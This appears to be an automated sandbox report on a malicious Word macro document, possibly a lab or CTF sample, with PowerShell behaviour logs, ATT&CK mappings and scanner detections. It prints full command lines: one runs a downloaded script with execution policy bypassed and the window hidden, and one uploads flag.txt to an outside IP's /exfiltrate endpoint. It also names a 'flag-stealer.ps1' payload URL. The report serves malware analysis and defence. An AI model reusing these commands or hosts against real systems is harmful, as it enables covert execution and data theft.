Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3292	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 649	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3497	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6055	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4052	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8112	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2840	Thread sleep time: -27670116110564310s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: powershell.exe, 0000000F.00000002.2609359619.0000000007773000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Bypasses PowerShell execution policy

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\downloaded_script.ps1"

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\upload_script.ps1" "C:\Users\user\AppData\Local\Temp\flag.txt" "http://18.157.68.73:11858/exfiltrate"

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	42 Scripting	Valid Accounts	13 Exploitation for Client Execution	42 Scripting	11 Process Injection	1 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 PowerShell	1 DLL Side-Loading	1 DLL Side-Loading	21 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	114 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	12 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
mal_temp.dotm.doc	57%	Virustotal		Browse
mal_temp.dotm.doc	47%	ReversingLabs	Win32.Exploit.Generic
mal_temp.dotm.doc	100%	Avira	HEUR/Macro.Downloader.ARIT.Gen

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\Desktop\~WRD0000.tmp	100%	Avira	HEUR/Macro.Downloader.YPA.Gen

Source	Detection	Scanner	Label
http://127.0.0.1:8000/download/ps1	0%	Avira URL Cloud	safe
http://18.157.68.73:11858/exfiltrate&	0%	Avira URL Cloud	safe
http://18.157.68.73:11858/exfiltrate)3D6	0%	Avira URL Cloud	safe
http://18.157.68.73:11858/exfiltratel	0%	Avira URL Cloud	safe
https://free-games-ua.s3.eu-central-1.amazonaws.com/flag-stealer.ps1	0%	Avira URL Cloud	safe
http://18.157.68.73:11858/exfiltrateK2b7	0%	Avira URL Cloud	safe
http://18.157.68.73:11858/exfiltrate	0%	Avira URL Cloud	safe
http://18.157.68.73:11858	0%	Avira URL Cloud	safe

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Reputation
s-0005.dual-s-msedge.net	52.123.129.14	true	false	high
s3-r-w.eu-central-1.amazonaws.com	52.219.171.190	true	false	high
free-games-ua.s3.eu-central-1.amazonaws.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://free-games-ua.s3.eu-central-1.amazonaws.com/flag-stealer.ps1	false	Avira URL Cloud: safe	unknown
http://18.157.68.73:11858/exfiltrate	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 0000000C.00000002.1335282288.00000000057EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2607566318.00000000062D0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.micro	powershell.exe, 0000000F.00000002.2609359619.0000000007747000.00000004.00000020.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000F.00000002.2600077843.00000000053B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2609359619.00000000076B1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lB	powershell.exe, 0000000C.00000002.1332259932.0000000004781000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2600077843.0000000005261000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000F.00000002.2600077843.00000000053B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2609359619.00000000076B1000.00000004.00000020.00020000.00000000.sdmp	false		high
